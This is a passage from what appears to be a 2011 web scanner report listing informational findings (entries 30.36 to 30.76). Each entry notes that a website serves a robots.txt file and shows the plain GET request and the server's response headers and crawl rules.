Connection: close

User-agent: *
Disallow: /app
Disallow: /server

30.36. http://router.infolinks.com/gsd/1304319928277.0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://router.infolinks.com
Path:   /gsd/1304319928277.0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: router.infolinks.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"47-1301491318000"
Last-Modified: Wed, 30 Mar 2011 13:21:58 GMT
Content-Type: text/plain
Content-Length: 47
Date: Mon, 02 May 2011 02:27:41 GMT
Connection: close

# not to be crawled
User-agent: *
Disallow: /


30.37. http://s0.2mdn.net/807725/OSA_Save_It_728x90_NoXML_1loop_102210_v001.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /807725/OSA_Save_It_728x90_NoXML_1loop_102210_v001.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 01 May 2011 18:47:14 GMT
Expires: Sat, 30 Apr 2011 18:05:11 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Age: 17237
Cache-Control: public, max-age=86400

User-agent: *
Disallow: /

30.38. http://segment-pixel.invitemedia.com/set_partner_uid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 01:56:44 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

30.39. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /js/api_lib/v0.4/XdCommReceiver.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.138.17.185
Date: Sun, 01 May 2011 23:34:45 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

30.40. http://static.pulse360.com/blob/fb/6e141bc3_social_security_card.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.pulse360.com
Path:   /blob/fb/6e141bc3_social_security_card.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.pulse360.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:22 GMT
Server: Apache
Last-Modified: Wed, 27 Apr 2011 14:40:58 GMT
ETag: "16fa40-23-6dc53280"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /cgi-bin/


30.41. http://sync.mathtag.com/sync/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n2a pid 0x6b3c 27452
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

30.42. http://tag.admeld.com/match

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /match

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Last-Modified: Fri, 29 Apr 2011 14:38:19 GMT
ETag: "683aba-1a-4a20f9ff9ccc0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Mon, 02 May 2011 02:06:10 GMT
Connection: close

User-agent: *
Disallow: /

30.43. http://translate.googleapis.com/translate_a/l

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/l

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: translate.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 25 Mar 2010 09:42:43 GMT
Date: Mon, 02 May 2011 02:28:15 GMT
Expires: Mon, 02 May 2011 02:28:15 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

30.44. http://us.bc.yahoo.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.bc.yahoo.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: us.bc.yahoo.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:33:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 03 Mar 2006 21:55:13 GMT
Accept-Ranges: bytes
Content-Length: 41
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# Do not crawl
User-agent: *
Disallow: /

30.45. http://usjobsresource.com/3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: usjobsresource.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:57 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 17 Jan 2011 18:44:38 GMT
ETag: "fccc3e-17-49a0f2d0f3180"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

30.46. http://va.px.invitemedia.com/goog_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /goog_imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:23:31 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

30.47. http://view.atdmt.com/ADO/view/284156785/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /ADO/view/284156785/direct

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: view.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Mon, 19 Oct 2009 19:29:35 GMT
Accept-Ranges: bytes
ETag: "4c95727df250ca1:0"
Date: Mon, 02 May 2011 02:20:10 GMT
Connection: close
Content-Length: 101

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

30.48. http://websiteprice.net/result/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /result/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: websiteprice.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 22 Oct 2009 09:06:37 GMT
Accept-Ranges: bytes
ETag: "4004f6f652ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:15:22 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

30.49. http://widgets.digg.com/buttons/count

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: widgets.digg.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 01 May 2011 23:25:00 GMT
Via: NS-CACHE: 100
Server: Apache
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Accept-Ranges: bytes
X-Digg-Time: D=302 (null)
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=86399
Expires: Mon, 02 May 2011 23:24:59 GMT
X-CDN: Cotendo
Connection: close

User-agent: *
Disallow: /

30.50. http://www.1728.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1728.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.1728.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:42 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 18 Jan 2011 04:01:47 GMT
ETag: "11460255-8e-49a16f59540c0"
Accept-Ranges: bytes
Content-Length: 142
Connection: close
Content-Type: text/plain

# robots.txt file for http://www.1728.com/
User-agent: Mediapartners-Google
Disallow:
sitemap: http://cdn.attracta.com/sitemap/505654.xml.gz


30.51. http://www.3fatchicks.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.3fatchicks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.3fatchicks.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:52 GMT
Server: Apache
Last-Modified: Fri, 12 Jun 2009 18:24:53 GMT
ETag: "1e02d19-49-46c2ad31a8740"
Accept-Ranges: bytes
Content-Length: 73
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerthreefatchicks_pool=518262956.20480.0000; path=/

User-agent: *
Allow: /

Sitemap: http://www.3fatchicks.com/sitemap.xml

30.52. http://www.4tubehd.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4tubehd.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.4tubehd.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:41 GMT
Server: Apache/2.2.16 (FreeBSD) DAV/2 PHP/5.3.5 with Suhosin-Patch
Last-Modified: Tue, 20 May 2008 22:13:35 GMT
ETag: "311987f-19-44db0ca9221c0"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

30.53. http://www.6mmbr.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.6mmbr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.6mmbr.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 24 Mar 2011 20:33:23 GMT
Accept-Ranges: bytes
ETag: "8667cbb862eacb1:0"
Server: Microsoft-IIS/7.5
Date: Sun, 01 May 2011 23:48:24 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

30.54. http://www.aacap.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aacap.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aacap.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:13:52 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
ETag: "+2/Rq4oKdog"
Last-Modified: Tue, 07 Sep 2010 15:14:15 GMT
Accept-Ranges: bytes
Content-Length: 35
Set-Cookie: JSESSIONID=ah6XIflHoim6olDdU_; path=/
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /galleries/

30.55. http://www.abcpaydaydirect.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abcpaydaydirect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.abcpaydaydirect.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:20 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Last-Modified: Fri, 14 Jan 2011 20:11:47 GMT
ETag: "87360f-e7-4d30ae03"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...

30.56. http://www.abdopain.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abdopain.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.abdopain.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:18 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.abdopain.com/WkgX1zul.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/
Disall
...[SNIP]...

30.57. http://www.acadiaferry.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acadiaferry.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.acadiaferry.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:49 GMT
Server: Apache/1.3.42 (Unix) Resin/2.1.13 mod_fastcgi/2.4.6 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Last-Modified: Wed, 05 Jan 2011 19:39:00 GMT
ETag: "2df0fcf-178-4d24c8d4"
Accept-Ranges: bytes
Content-Length: 376
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

30.58. http://www.accesskansas.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accesskansas.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.accesskansas.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:11 GMT
Server: Apache
Last-Modified: Wed, 30 Mar 2011 14:31:12 GMT
ETag: "468ae-38-7490c00"
Accept-Ranges: bytes
Content-Length: 56
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerSTAT-01=eVtIU3dKLJrl1pdi2/r4yXnQdKxpyo1dQkeY2O35cQ8ZClT4BZIgeVWBJPvTHcqdNgnMMm/FWdQvrg==; path=/

User-agent: *
Disallow: /cgi-bin/
Disallow: /amber.html

30.59. http://www.aces.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aces.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aces.edu

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:36:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 22 Feb 2008 17:11:56 GMT
ETag: "14386c5-fa-51c04f00"
Accept-Ranges: bytes
Content-Length: 250
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /user/
Disallow: /users/
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/
Disallow: /aawm/Modules/
Disallow: /temp/
Disallow
...[SNIP]...

30.60. http://www.activexguide.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.activexguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.activexguide.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.9
Last-Modified: Fri, 12 Feb 2010 02:33:23 GMT
ETag: "450357-130-47f5e176522c0"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

30.61. http://www.allelectronics.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allelectronics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allelectronics.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:29 GMT
Server: Apache
Last-Modified: Thu, 15 May 2008 15:59:14 GMT
ETag: "14b580c-24-482c5dd2"
Accept-Ranges: bytes
Content-Length: 36
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /index.php?

30.62. http://www.alphashark.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alphashark.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alphashark.com

Response

HTTP/1.1 200 OK
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Wed, 28 Apr 2010 08:15:14 GMT
Accept-Ranges: bytes
ETag: "055afedaae6ca1:10e2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:45 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

30.63. http://www.amateurow.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amateurow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amateurow.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 01 May 2011 23:41:52 GMT
Content-Type: text/plain
Content-Length: 24
Last-Modified: Thu, 01 Oct 2009 11:14:47 GMT
Connection: close
Expires: Wed, 04 May 2011 23:41:52 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes

User-agent: *
Disallow:

30.64. http://www.americanbible.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanbible.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americanbible.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:09:51 GMT
Server: Apache
Last-Modified: Wed, 28 Apr 2010 14:33:22 GMT
ETag: "24c86-636-4854ce45ab080"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Mon, 16 May 2011 00:09:51 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

30.65. http://www.americanclassifieds.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanclassifieds.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americanclassifieds.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:38:21 GMT
Server: Apache/1.3.41 (Unix) mod_jk/1.2.27
Last-Modified: Sat, 16 Oct 2010 01:36:51 GMT
ETag: "1335f-e4-4cb901b3"
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: text/plain

# robots.txt for http://www.tnol.com/
Sitemap: http://www.tnol.com/sitemap1.xml

User-agent: *

Disallow: /email_ad.cfm*
Disallow: /viewImageOffensive.cfm*
Disallow: /saveAd.cfm*
Disallow: /login.cfm*
...[SNIP]...

30.66. http://www.androidtablets.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.androidtablets.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.androidtablets.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:39 GMT
Server: Apache
Last-Modified: Thu, 24 Dec 2009 02:39:35 GMT
ETag: "2a78c6-1e5-47b705980a7c0"
Accept-Ranges: bytes
Content-Length: 485
Connection: close
Content-Type: text/plain

Sitemap: http://www.androidtablets.net/forum/sitemap_index.xml.gz

User-agent: *
Disallow: /*-print/
Disallow: /vbseocp.php
Disallow: /login.php
Disallow: /member.php
Disallow: /memberlist.php
Disallo
...[SNIP]...

30.67. http://www.anilinkz.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.anilinkz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.anilinkz.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:34 GMT
Server: Apache
Last-Modified: Thu, 30 Sep 2010 05:55:45 GMT
ETag: "34018d8-203-49173ba9d9a40"
Accept-Ranges: bytes
Content-Length: 515
Cache-Control: max-age=604800, public, must-revalidate
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /files/
Disallow: /testing/
Disallow: /static/
Disallow: /temp/
Disallow: /images/
Disallow: /banner/
Disallow: /pictures/
Disallow: /wp-admin/
Disallow: /w
...[SNIP]...

30.68. http://www.animatedknots.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.animatedknots.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.animatedknots.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 08 Apr 2011 19:58:24 GMT
ETag: "6fa83-600-a603f800"
Accept-Ranges: bytes
Content-Length: 1536
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /logo.php
Disallow: /logodemo.php

User-agent: Titan
Disallow: /

User-agent: ExtractorPro
Disallow: /

User-agent: atSpider
Disallow: /

User-agent: cherry
...[SNIP]...

30.69. http://www.anvato.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.anvato.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.anvato.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:19:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: W3 Total Cache/0.9.1.3
X-Pingback: http://www.anvato.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Length: 71
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.anvato.com/sitemap.xml.gz

30.70. http://www.aol.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aol.co.uk

Response

HTTP/1.0 200 OK
X-RSP: 1
set-cookie: dcisid=4276800956.1187953741.1436025088; path=/
Cache-Control: no-cache, no-store, private, max-age=0
Set-Cookie: bandType="narrowband"; path=/; domain=.aol.co.uk
MIME-Version: 1.0
Date: Mon, 02 May 2011 00:33:04 GMT
Server: AOLserver/4.0.10
Content-Type: text/plain
Content-Length: 107
Connection: keep-alive


User-agent: *
Disallow: /talktalk
Disallow: /ukrestart
Disallow: /links

30.71. http://www.apartmentsmart.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmentsmart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apartmentsmart.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 07 Jun 2010 23:04:16 GMT
Accept-Ranges: bytes
ETag: "ec6b0c1956cb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: .ASPXANONYMOUS=JOlHb-o-zAEkAAAAYjE3YmU4OTQtYjNhOS00ZDVkLTg1N2UtMWQ0MTI4ODBjYzBk0; expires=Sun, 10-Jul-2011 10:16:29 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:36:29 GMT
Connection: close
Content-Length: 2351

#/-----------------------------------------------\
#| |
#| |
#|
...[SNIP]...

30.72. http://www.architecturaldigest.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.architecturaldigest.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.architecturaldigest.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "6520a050098b9c331ba54961adc5197b:1218724813"
Last-Modified: Thu, 14 Aug 2008 14:40:13 GMT
Accept-Ranges: bytes
Content-Length: 179
Content-Type: text/plain
Date: Mon, 02 May 2011 00:19:00 GMT
Connection: close
X-N: S

#disallow /user/ as there are incoming links going to pages within the /user/ directory that can't be accessed.
User-agent: *
Disallow: /user/
Disallow: /ontheweb/blogs/delineator

30.73. http://www.argosy.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.argosy.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.argosy.edu

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: text/plain
Last-Modified: Tue, 01 Mar 2011 15:28:08 GMT
Accept-Ranges: bytes
ETag: "074364425d8cb1:fc87"
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:00:38 GMT
Connection: close

# robots.txt, www.argosy.edu 03/01/2011

User-agent: *
Disallow: /interview
Disallow: /StudentLink
Disallow: /pdf/social-media-terms-of-use.pdf

User-Agent: Charlotte
Disallow: /

User-Agen
...[SNIP]...

30.74. http://www.arkive.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arkive.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.arkive.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:52:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 10 Mar 2011 16:25:33 GMT
ETag: "1298629-119-4b681940"
Accept-Ranges: bytes
Content-Length: 281
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /misc/Coral/
Disallow: /*/*/*displayMode=link-to-this-page
Disallow: /search

Disallow: /*/*/related
Disallow: /*/*/user-images
Disallow: /*/*/facts
...[SNIP]...

30.75. http://www.arktimes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arktimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.arktimes.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:29:05 GMT
Server: Apache
Last-Modified: Thu, 23 Jul 2009 22:30:55 GMT
ETag: "1c8-4a68e49f"
Accept-Ranges: bytes
Content-Length: 456
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /gyrobase/ArticleArchives
Disallow: /gyrobase/EventSearch
Disallow: /gyrobase/FilmSearch
Disallow: /gyrobase/LocationSearch
Disallow: /gyrobase/MovieTimes
Disallow: /gyrobase/S
...[SNIP]...

30.76. http://www.armchairgeneral.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.armchairgeneral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.armchairgeneral.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:30:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 12 Jun 2009 20:34:43 GMT
ETag: "30005f-59e-46c2ca36c7ec0"
Accept-Ranges: bytes
Content-Length: 1438
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /chat

Disallow: /banner

Disallow: /cgi-bin

Disallow: /directory

Disallow: /games

Disallow: /modules

Disallow: /napoleon

Disallow: /phpQJr/

Disallow: /poll

Disallow:
...[SNIP]...

